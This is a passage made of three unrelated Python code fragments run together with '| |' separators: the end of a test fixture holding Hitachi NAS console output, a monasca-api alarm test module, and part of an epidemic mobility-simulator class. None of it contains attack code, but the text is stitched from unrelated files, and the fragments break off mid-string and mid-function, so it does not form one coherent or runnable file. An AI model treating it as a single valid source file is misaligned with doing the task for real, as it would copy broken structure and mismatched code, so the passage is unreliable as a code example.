GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 9\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:09\r
Blocksize: 512\r
Superflush: Default\r
Lun: 9\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0000\r
HDS dev name: 1009\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 10\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]60:06:0E:80:13:32:66:00:50:20:32:66:00:00:10:0A\r
Blocksize: 512\r
Superflush: Default\r
Lun: 10\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0400\r
HDS dev name: 100A\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
Device ID: 11\r
Comment: \r
Capacity: 50GiB (53687746560 bytes)\r
Status: OK\r
Role: Primary\r
Access: Allowed\r
Used in span: 'span2' (capacity 400GiB)\r
Type: Make: HITACHI; Model: OPEN-V; Revision: 7303\r
Submodel: HM70\r
Luid: [03:01:00]fc00:db20:35b:7399::5:50:20:32:66:00:00:10:0B\r
Blocksize: 512\r
Superflush: Default\r
Lun: 11\r
Serial number: 212902\r
Site ID: 0\r
Tier: None\r
HDS ctrlr port: 0000\r
HDS dev name: 100B\r
HDP pool no: 0\r
GAD: No\r
Queue depth: min 16, default 32, max 512, configured [default],
effective 32\r
\r
pba-hnas-1-1:$ """
POOL_INFO = """\r
span-list\r
\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ span-list\r
Span instance name OK? Free Cap/GiB System drives Con\r
--------------------- --- ---- ------- ------------------------- ---\r
span1 Yes 100% 200 0,1,2,3 90%\r
Tier 0: empty: file systems can't be created or mounted\r
Tier 1: capacity 200GiB; free: 200GiB (100%); HDP pool free 996GiB\r
span2 Yes 86% 400 4,5,6,7;8,9,10,11 90%\r
pba-hnas-1-1:$ """
POOL_DETAIL_INFO = """\r
\r
\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ span-space-distribution\r
Span span2:\r
\r
How each stripeset is used:\r
Stripeset 0:\r
18GiB 9.09% fs1\r
18GiB 9.09% fs2\r
18GiB 9.09% fs3\r
145GiB 72.74% [Free space]\r
Stripeset 1:\r
200GiB 100.00% [Free space]\r
\r
Where each filesystem resides:\r
Filesystem fs1:\r
Stripeset 0 18GiB 100.00%\r
Filesystem fs2:\r
Stripeset 0 18GiB 100.00%\r
Filesystem fs3:\r
Stripeset 0 18GiB 100.00%\r
\r
Span span1:\r
\r
How each stripeset is used:\r
Stripeset 0:\r
200GiB 100.00% [Free space]\r
\r
Where each filesystem resides:\r
\r
pba-hnas-1-1:$"""
ALERT_INFO = """\r
\r
HDS NAS OS Console\r
MAC ID : B7-6F-30-98-A6-57\r
\r
pba-hnas-1-1:$ event-log-show -w -s\r
****** Current time : 2021-10-25 11:12:35+08:00 ******\r
8208 Information 2021-11-02 08:26:01+08:00 Chassis device 'md0'
is running background media scan.\r
CAUSE: Chassis drive volume is running a media check.\r
RESOLUTION: No Action required.\r
\r
8462 Warning 2021-11-02 08:00:10+08:00 [ pba-hnas-1 ] The
SMU does not have an email
alert profile relating to a managed server.\r
CAUSE: An email alert profile relating to a managed
server must be applied to the SMU so that alert and diagnostic
emails can be sent to the required recipients.\r
RESOLUTION: Go to an SMTP Email Profile page and apply a
profile to the SMU.\r
\r
8208 Information 2021-11-02 04:04:01+08:00 Chassis device 'md2'
is running background media scan.\r
CAUSE: Chassis drive volume is running a media check.\r
RESOLUTION: No Action required.\r
\r
8209 Information 2021-11-02 04:04:00+08:00 Chassis device 'md3'
has completed background media scan.\r
CAUSE: Chassis drive volume media check has completed.\r
RESOLUTION: No Action required.\r
\r
9995 Information 2021-11-01 20:50:36+08:00 wq test snmp.\r
CAUSE: A test event was requested.\r
RESOLUTION: No action required.\r
\r\
3303 Information 2021-11-01 19:27:22+08:00 Exceeded socket backlog:
dropping additional connection request from 127.0.0.1:34008->127.0.0.1:206:
this event, Id 3303, happened once in the last 6.25 d on the MMB1.\r
CAUSE: Socket backlogged: could not allow a new connection.\r
RESOLUTION: This is expected behavior on receiving a flurry of
connection requests. If it happens in other circumstances,
run the Performance Info Report, then report this and send the
PIR results to your support provider.\r
\r
8208 Information 2021-11-01 16:44:01+08:00 Chassis device 'md3' is
running background media scan.\r
CAUSE: Chassis drive volume is running a media check.\r
RESOLUTION: No Action required.\r
\r
8462 Warning 2021-11-01 08:00:10+08:00 [ pba-hnas-1 ] The SMU
does not have an email alert profile relating to a managed server.\r
CAUSE: An email alert profile relating to a managed server
must be applied to the SMU so that alert and diagnostic emails
can | |
# -*- coding: utf-8 -*-
# Copyright 2015 Cray Inc.
# (C) Copyright 2015,2017 Hewlett Packard Enterprise Development LP
# Copyright 2016-2017 FUJITSU LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import OrderedDict
import copy
import datetime
import json
import falcon.testing
import fixtures
import testtools.matchers as matchers
from mock import Mock
import oslo_config.fixture
import six
from monasca_api.common.repositories.model import sub_alarm_definition
from monasca_api.tests import base
from monasca_api.v2.common.exceptions import HTTPUnprocessableEntityError
from monasca_api.v2.reference import alarm_definitions
from monasca_api.v2.reference import alarms
CONF = oslo_config.cfg.CONF
TENANT_ID = u"fedcba9876543210fedcba9876543210"
ALARM_HISTORY = OrderedDict((
# Only present in data returned from InfluxDB:
(u"time", u"2015-01-01T00:00:00.000Z"),
# Only present in data returned from API:
(u"timestamp", u"2015-01-01T00:00:00.000Z"),
(u"alarm_id", u"10000000-1000-1000-1000-10000000000"),
(u"metrics", [{
u"id": None,
u"name": u"test.metric",
u"dimensions": {u"dim1": u"dval1", u"dim2": u"dval2"}
}]),
(u"new_state", u"ALARM"),
(u"old_state", u"OK"),
(u"reason", u"Alarm reason"),
(u"reason_data", u"{}"),
(u"sub_alarms", [{
u"sub_alarm_expression": {
u"function": u"MAX",
# Only present in data returned from InfluxDB:
u"metric_definition": {
u"id": None,
u"name": u"test.metric",
u"dimensions": {u"dim1": u"dval1"},
},
# Only present in data returned from API:
u'metric_name': u'test.metric',
# Only present in data returned from API:
u'dimensions': {u'dim1': u'dval1'},
u"operator": u"GT",
u"threshold": 50.0,
u"period": 60,
u"periods": 1
},
u"sub_alarm_state": u"ALARM",
u"current_values": [50.1],
}]),
# Only present in data returned from InfluxDB:
(u"tenant_id", TENANT_ID),
# Only present in data returned from API:
(u"id", u"1420070400000"),
))
class InfluxClientAlarmHistoryResponseFixture(fixtures.MockPatch):
def _build_series(self, name, column_dict):
return {
"name": name,
"columns": column_dict.keys(),
"values": [column_dict.values(), ],
}
def _setUp(self):
super(InfluxClientAlarmHistoryResponseFixture, self)._setUp()
mock_data = copy.deepcopy(ALARM_HISTORY)
del mock_data[u"id"]
del mock_data[u"timestamp"]
del mock_data[u"sub_alarms"][0][u"sub_alarm_expression"][u"metric_name"]
del mock_data[u"sub_alarms"][0][u"sub_alarm_expression"][u"dimensions"]
mock_data[u"sub_alarms"] = json.dumps(mock_data[u"sub_alarms"])
mock_data[u"metrics"] = json.dumps(mock_data[u"metrics"])
self.mock.return_value.query.return_value.raw = {
"series": [self._build_series("alarm_state_history", mock_data)]
}
class RESTResponseEquals(object):
"""Match if the supplied data contains a single string containing a JSON
object which decodes to match expected_data, excluding the contents of
the 'links' key.
"""
def __init__(self, expected_data):
self.expected_data = expected_data
if u"links" in expected_data:
del expected_data[u"links"]
def __str__(self):
return 'RESTResponseEquals(%s)' % (self.expected,)
def match(self, actual):
response_data = actual.json
if u"links" in response_data:
del response_data[u"links"]
return matchers.Equals(self.expected_data).match(response_data)
class AlarmTestBase(base.BaseApiTestCase):
def setUp(self):
super(AlarmTestBase, self).setUp()
self.useFixture(fixtures.MockPatch(
'monasca_api.common.messaging.kafka_publisher.KafkaPublisher'))
# [messaging]
self.conf_override(
driver='monasca_api.common.messaging.'
'kafka_publisher:KafkaPublisher',
group='messaging')
# [repositories]
self.conf_override(
alarms_driver='monasca_api.common.repositories.sqla.'
'alarms_repository:AlarmsRepository',
group='repositories')
self.conf_override(
alarm_definitions_driver='monasca_api.common.repositories.'
'alarm_definitions_repository:'
'AlarmDefinitionsRepository',
group='repositories')
self.conf_override(
metrics_driver='monasca_api.common.repositories.influxdb.'
'metrics_repository:MetricsRepository',
group='repositories')
class TestAlarmsStateHistory(AlarmTestBase):
def setUp(self):
super(TestAlarmsStateHistory, self).setUp()
self.useFixture(fixtures.MockPatch(
'monasca_api.common.repositories.sqla.'
'alarms_repository.AlarmsRepository'))
self.useFixture(InfluxClientAlarmHistoryResponseFixture(
'monasca_api.common.repositories.influxdb.'
'metrics_repository.client.InfluxDBClient'))
self.alarms_resource = alarms.AlarmsStateHistory()
self.app.add_route(
'/v2.0/alarms/{alarm_id}/state-history/', self.alarms_resource)
self.app.add_route(
'/v2.0/alarms/state-history/', self.alarms_resource)
def test_alarm_state_history(self):
expected_elements = {u"elements": [dict(ALARM_HISTORY)]}
del expected_elements[u"elements"][0][u"time"]
del (expected_elements[u"elements"][0][u"sub_alarms"][0]
[u"sub_alarm_expression"][u"metric_definition"])
del expected_elements[u"elements"][0][u"tenant_id"]
response = self.simulate_request(
path=u'/v2.0/alarms/%s/state-history/' % ALARM_HISTORY[u"alarm_id"],
headers={
'X-Roles': CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID,
})
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_alarm_state_history_no_alarm_id(self):
expected_elements = {u'elements': []}
response = self.simulate_request(
path=u'/v2.0/alarms/state-history/',
headers={
'X-Roles': CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID,
})
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
class TestAlarmsCount(AlarmTestBase):
def setUp(self):
super(TestAlarmsCount, self).setUp()
self.alarms_get_alarms_count_mock = self.useFixture(fixtures.MockPatch(
'monasca_api.common.repositories.sqla.alarms_repository.AlarmsRepository'
)).mock
self.alarms_count_resource = alarms.AlarmsCount()
self.app.add_route('/v2.0/alarms/count',
self.alarms_count_resource)
def test_get_alarm_count(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'counts': [[4]], 'columns': ['count']}
return_value.get_alarms_count.return_value = [{'count': 4}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_state_parameter(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'counts': [[4]], 'columns': ['count']}
return_value.get_alarms_count.return_value = [{'count': 4}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='state=OK')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_severity_parameter(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'counts': [[4]], 'columns': ['count']}
return_value.get_alarms_count.return_value = [{'count': 4}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='severity=LOW')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_group_by_parameter(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'columns': ['count', 'metric_name'],
'counts': [[2, 'cpu.idle_perc'],
[1, 'cpu.sys_mem']]}
return_value.get_alarms_count.return_value = [{'metric_name': u'cpu.idle_perc', 'count': 2},
{'metric_name': u'cpu.sys_mem', 'count': 1}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=metric_name')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
expected_elements = {'columns': ['count', 'metric_name', 'dimension_name'],
'counts': [[2, 'cpu.idle_perc', 'hostname'],
[1, 'cpu.sys_mem', 'hostname']]}
return_value.get_alarms_count.return_value = [{'metric_name': u'cpu.idle_perc',
'dimension_name': 'hostname',
'count': 2},
{'metric_name': u'cpu.sys_mem',
'dimension_name': 'hostname',
'count': 1}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=metric_name,dimension_name')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_incorrect_group_by_parameter(self):
return_value = self.alarms_get_alarms_count_mock.return_value
return_value.get_alarms_count.return_value = [{'metric_name': u'cpu.idle_perc', 'count': 2},
{'metric_name': u'cpu.sys_mem', 'count': 1}]
response = self.simulate_request(
path='/v2.0/alarms/count',
headers={'X-Roles': CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=hahahah')
self.assertEqual(response.status, falcon.HTTP_422)
def test_get_alarm_count_offset(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'columns': ['count', 'metric_name'],
'counts': [[2, 'cpu.idle_perc']]}
return_value.get_alarms_count.return_value = [{'metric_name': u'cpu.idle_perc', 'count': 2}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=metric_name&offset=1')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_incorrect_offset(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'description': 'Offset must be a valid integer, was hahahah',
'title': 'Unprocessable Entity'}
return_value.get_alarms_count.return_value = [{'metric_name': u'cpu.idle_perc', 'count': 2}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=metric_name&offset=hahahah')
self.assertEqual(response.status, falcon.HTTP_422)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_limit_parameter(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'counts': [[4]], 'columns': ['count']}
return_value.get_alarms_count.return_value = [{'count': 4}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='limit=1')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
return_value.get_alarms_count.return_value = [{'count': 4}]
expected_elements = {'counts': [], 'columns': ['count']}
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='limit=0')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
def test_get_alarm_count_when_count_is_zero(self):
return_value = self.alarms_get_alarms_count_mock.return_value
expected_elements = {'columns': ['count', 'metric_name'], 'counts': [[0, None]]}
return_value.get_alarms_count.return_value = [{'count': 0}]
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='group_by=metric_name')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
expected_elements = {'columns': ['count'], 'counts': [[0]]}
response = self.simulate_request(path='/v2.0/alarms/count',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_elements))
class TestAlarms(AlarmTestBase):
def setUp(self):
super(TestAlarms, self).setUp()
self.alarms_repo_mock = self.useFixture(fixtures.MockPatch(
'monasca_api.common.repositories.sqla.alarms_repository.AlarmsRepository'
)).mock
self.alarms_resource = alarms.Alarms()
self.app.add_route('/v2.0/alarms',
self.alarms_resource)
self.app.add_route('/v2.0/alarms/{alarm_id}',
self.alarms_resource)
def test_alarms_get_alarms(self):
return_value = self.alarms_repo_mock.return_value
return_value.get_alarms.return_value = \
[{'alarm_definition_id': '1',
'metric_dimensions': 'instance_id=123,service=monitoring',
'alarm_definition_name': '90% CPU',
'state': 'OK',
'state_updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'metric_name': 'cpu.idle_perc',
'link': 'http://somesite.com/this-alarm-info',
'severity': 'LOW',
'created_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'alarm_id': '1',
'lifecycle_state': 'OPEN'}]
expected_alarms = {
'elements': [{
'alarm_definition': {
'id': '1',
'links': [{
'href': 'http://falconframework.org/v2.0/alarm-definitions/1',
'rel': 'self'}],
'name': '90% CPU',
'severity': 'LOW'},
'created_timestamp': '2015-03-14T09:26:53Z',
'id': '1',
'lifecycle_state': 'OPEN',
'link': 'http://somesite.com/this-alarm-info',
'links': [{
'href': 'http://falconframework.org/v2.0/alarms/1',
'rel': 'self'}],
'metrics': [{
'dimensions': {
'instance_id': '123',
'service': 'monitoring'},
'name': 'cpu.idle_perc'}],
'state': 'OK',
'state_updated_timestamp': '2015-03-14T09:26:53Z',
'updated_timestamp': '2015-03-14T09:26:53Z'}]}
response = self.simulate_request(path='/v2.0/alarms',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_alarms))
def test_alarms_get_alarm(self):
return_value = self.alarms_repo_mock.return_value
return_value.get_alarm.return_value = \
[{'alarm_definition_id': '1',
'metric_dimensions': 'instance_id=123,service=monitoring',
'alarm_definition_name': '90% CPU',
'state': 'OK',
'state_updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'metric_name': 'cpu.idle_perc',
'link': 'http://somesite.com/this-alarm-info',
'severity': 'LOW',
'created_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'alarm_id': '1',
'lifecycle_state': 'OPEN'}]
expected_alarms = {'alarm_definition': {
'id': '1',
'links': [{
'href': 'http://falconframework.org/v2.0/alarm-definitions/1',
'rel': 'self'}],
'name': '90% CPU',
'severity': 'LOW'},
'created_timestamp': '2015-03-14T09:26:53Z',
'id': '1',
'lifecycle_state': 'OPEN',
'link': 'http://somesite.com/this-alarm-info',
'links': [{
'href': 'http://falconframework.org/v2.0/alarms/1',
'rel': 'self'}],
'metrics': [{
'dimensions': {
'instance_id': '123',
'service': 'monitoring'},
'name': 'cpu.idle_perc'}],
'state': 'OK',
'state_updated_timestamp': '2015-03-14T09:26:53Z',
'updated_timestamp': '2015-03-14T09:26:53Z'}
response = self.simulate_request(path='/v2.0/alarms/1',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_alarms))
def test_alarms_get_alarms_state_parameter(self):
return_value = self.alarms_repo_mock.return_value
return_value.get_alarms.return_value = \
[{'alarm_definition_id': '1',
'metric_dimensions': 'instance_id=123,service=monitoring',
'alarm_definition_name': '90% CPU',
'state': 'OK',
'state_updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'metric_name': 'cpu.idle_perc',
'link': 'http://somesite.com/this-alarm-info',
'severity': 'LOW',
'created_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'alarm_id': '1',
'lifecycle_state': 'OPEN'}]
expected_alarms = {
'elements': [{
'alarm_definition': {
'id': '1',
'links': [{
'href': 'http://falconframework.org/v2.0/alarm-definitions/1',
'rel': 'self'}],
'name': '90% CPU',
'severity': 'LOW'},
'created_timestamp': '2015-03-14T09:26:53Z',
'id': '1',
'lifecycle_state': 'OPEN',
'link': 'http://somesite.com/this-alarm-info',
'links': [{
'href': 'http://falconframework.org/v2.0/alarms/1',
'rel': 'self'}],
'metrics': [{
'dimensions': {
'instance_id': '123',
'service': 'monitoring'},
'name': 'cpu.idle_perc'}],
'state': 'OK',
'state_updated_timestamp': '2015-03-14T09:26:53Z',
'updated_timestamp': '2015-03-14T09:26:53Z'}]}
response = self.simulate_request(path='/v2.0/alarms',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
query_string='state=OK')
self.assertEqual(response.status, falcon.HTTP_200)
self.assertThat(response, RESTResponseEquals(expected_alarms))
def test_alarms_get_alarms_severity_parameter(self):
return_value = self.alarms_repo_mock.return_value
return_value.get_alarms.return_value = \
[{'alarm_definition_id': '1',
'metric_dimensions': 'instance_id=123,service=monitoring',
'alarm_definition_name': '90% CPU',
'state': 'OK',
'state_updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'metric_name': 'cpu.idle_perc',
'link': 'http://somesite.com/this-alarm-info',
'severity': 'LOW',
'created_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'updated_timestamp': datetime.datetime(2015, 3, 14, 9, 26, 53),
'alarm_id': '1',
'lifecycle_state': 'OPEN'}]
expected_alarms = {
'elements': [{
'alarm_definition': {
'id': '1',
'links': [{
'href': 'http://falconframework.org/v2.0/alarm-definitions/1',
'rel': 'self'}],
'name': '90% CPU',
'severity': 'LOW'},
'created_timestamp': '2015-03-14T09:26:53Z',
'id': '1',
'lifecycle_state': 'OPEN',
'link': 'http://somesite.com/this-alarm-info',
'links': [{
'href': 'http://falconframework.org/v2.0/alarms/1',
'rel': 'self'}],
'metrics': [{
'dimensions': {
'instance_id': '123',
'service': 'monitoring'},
'name': 'cpu.idle_perc'}],
'state': 'OK',
'state_updated_timestamp': '2015-03-14T09:26:53Z',
'updated_timestamp': '2015-03-14T09:26:53Z'}]}
response = self.simulate_request(path='/v2.0/alarms',
headers={'X-Roles':
CONF.security.default_authorized_roles[0],
'X-Tenant-Id': TENANT_ID},
method='GET',
| |
site, i.e. number of visits per time unit
dur_mean : float
Mean duration of a visit
num_age_groups : int
Number of age groups
verbose : bool (optional, default: False)
Verbosity level
"""
synthetic = (num_people is not None and num_sites is not None and mob_rate_per_type is not None and
dur_mean is not None and num_age_groups is not None)
real = (home_loc is not None and people_age is not None and site_loc is not None and site_type is not None and
mob_rate_per_age_per_type is not None and dur_mean_per_type is not None and home_tile is not None and
tile_site_dist is not None and variety_per_type is not None)
assert (synthetic != real), 'Unable to decide on real or synthetic mobility generation based on given arguments'
if synthetic:
self.mode = 'synthetic'
self.num_people = num_people
self.num_sites = num_sites
self.num_site_types = len(mob_rate_per_type)
self.num_age_groups = num_age_groups
# common duration for all types
self.dur_mean_per_type = np.array(self.num_site_types*[dur_mean])
# common mobility rate for all age groups
self.mob_rate_per_age_per_type = np.tile(mob_rate_per_type,(num_age_groups,1))
self.home_tile=None
self.tile_site_dist=None
self.variety_per_type=None
elif real:
self.mode = 'real'
self.num_people = len(home_loc)
self.home_loc = np.array(home_loc)
self.people_age = np.array(people_age)
self.num_sites = len(site_loc)
self.site_loc = np.array(site_loc)
self.site_type = np.array(site_type)
self.mob_rate_per_age_per_type = np.array(mob_rate_per_age_per_type)
self.num_age_groups = self.mob_rate_per_age_per_type.shape[0]
self.num_site_types = self.mob_rate_per_age_per_type.shape[1]
self.dur_mean_per_type = np.array(dur_mean_per_type)
self.variety_per_type=np.array(variety_per_type)
self.home_tile=np.array(home_tile)
self.tile_site_dist=np.array(tile_site_dist)
else:
raise ValueError('Provide more information for the generation of mobility data.')
self.delta = delta
self.verbose = verbose
@staticmethod
def from_json(fp, compute_contacts=True):
"""
Reach the from `fp` (.read()-supporting file-like object) that is
expected to be JSON-formated from the `to_json` file.
Parameters
----------
fp : object
The input .read()-supporting file-like object
compute_contacts : bool (optional, default: True)
Indicate if contacts should be computed from the mobility traces.
If True, then any `contact` key in `fp` will be ignored.
If False, `fp` must have a contact` key.
Return
------
sim : MobilitySimulator
The loaded object
"""
# Read file into json dict
data = json.loads(fp.read())
# Init object
init_attrs = ['num_people', 'num_sites', 'delta',
'mob_mean', 'dur_mean', 'verbose']
obj = MobilitySimulator(**{attr: data[attr] for attr in init_attrs})
# Set np.ndarray attributes
for attr in ['home_loc', 'site_loc']:
setattr(obj, attr, np.array(data[attr]))
# Set list attributes
for attr in ['visit_counts']:
setattr(obj, attr, list(data[attr]))
# Set `mob_traces` attribute into dict:defaultdict:InterLap
setattr(obj, 'mob_traces', {i: defaultdict(InterLap) for i in range(obj.num_people)})
for indiv, traces_i in data['mob_traces'].items():
indiv = int(indiv) # JSON does not support int keys
for site, visit_list in traces_i.items():
site = int(site) # JSON does not support int keys
if len(visit_list) > 0:
inter = InterLap()
inter.update(list(map(lambda t: Visit(*t), visit_list)))
obj.mob_traces[indiv][site] = inter
# Set `contacts` attribute into dict:defaultdict:InterLap
if compute_contacts: # Compute from `mob_traces`
all_mob_traces = []
for i, traces_i in obj.mob_traces.items():
for j, inter in traces_i.items():
all_mob_traces.extend(inter._iset)
# Compute contacts from mobility traces
obj.contacts = obj._find_contacts(all_mob_traces)
else: # Load from file
setattr(obj, 'contacts', {i: defaultdict(InterLap) for i in range(obj.num_people)})
for indiv_i, contacts_i in data['contacts'].items():
indiv_i = int(indiv_i) # JSON does not support int keys
for indiv_j, contact_list in contacts_i.items():
indiv_j = int(indiv_j) # JSON does not support int keys
if len(contact_list) > 0:
inter = InterLap()
inter.update(list(map(lambda t: Contact(*t), contact_list)))
obj.contacts[indiv_i][indiv_j] = inter
return obj
@staticmethod
def from_pickle(path):
"""
Load object from pickle file located at `path`
Parameters
----------
path : str
Path to input file
Return
------
sim : MobilitySimulator
The loaded object
"""
with open(path, 'rb') as fp:
obj = pickle.load(fp)
return obj
def to_pickle(self, path):
"""
Save object to pickle file located at `path`
Parameters
----------
path : str
Path to output file
"""
with open(path, 'wb') as fp:
pickle.dump(self, fp)
def _simulate_mobility(self, max_time, seed=None):
"""
Simulate mobility of all people for `max_time` time units
Parameters
----------
max_time : float
Number time to simulate
seed : int
Random seed for reproducibility
Return
------
mob_traces : list of `Visit` namedtuples
List of simulated visits of individuals to sites
home_loc : numpy.ndarray
Locations of homes of individuals
site_loc : numpy.ndarray
Locations of sites
"""
# Set random seed for reproducibility
seed = seed or rd.randint(0, 2**32 - 1)
rd.seed(seed)
np.random.seed(seed-1)
if self.mode == 'synthetic':
# Random geographical assignment of people's home on 2D grid
self.home_loc = np.random.uniform(0.0, 1.0, size=(self.num_people, 2))
# Age-group of individuals
self.people_age = np.random.randint(low=0, high=self.num_age_groups,
size=self.num_people, dtype=int)
# Random geographical assignment of sites on 2D grid
self.site_loc = np.random.uniform(0.0, 1.0, size=(self.num_sites, 2))
# Random type for each site
site_type_prob = np.ones(self.num_site_types)/self.num_site_types
self.site_type = np.random.multinomial(
n=1, pvals=site_type_prob, size=self.num_sites).argmax(axis=1)
all_mob_traces, self.visit_counts = _simulate_synthetic_mobility_traces(
num_people=self.num_people,
num_sites=self.num_sites,
max_time=max_time,
home_loc=self.home_loc,
site_loc=self.site_loc,
site_type=self.site_type,
people_age=self.people_age,
mob_rate_per_age_per_type=self.mob_rate_per_age_per_type,
dur_mean_per_type=self.dur_mean_per_type,
delta=self.delta,
seed=rd.randint(0, 2**32 - 1)
)
elif self.mode == 'real':
all_mob_traces, self.visit_counts = _simulate_real_mobility_traces(
num_people=self.num_people,
max_time=max_time,
site_type=self.site_type,
people_age=self.people_age,
mob_rate_per_age_per_type=self.mob_rate_per_age_per_type,
dur_mean_per_type=self.dur_mean_per_type,
delta=self.delta,
home_tile=self.home_tile,
variety_per_type=self.variety_per_type,
tile_site_dist=self.tile_site_dist,
seed=rd.randint(0, 2**32 - 1)
)
# Group mobility traces per indiv and site
self.mob_traces = self._group_mob_traces(all_mob_traces)
return all_mob_traces
def _find_contacts(self, mob_traces):
"""Find contacts in a given list `mob_traces` of `Visit`s"""
# Group mobility traces by site
mob_traces_at_site = defaultdict(list)
for v in mob_traces:
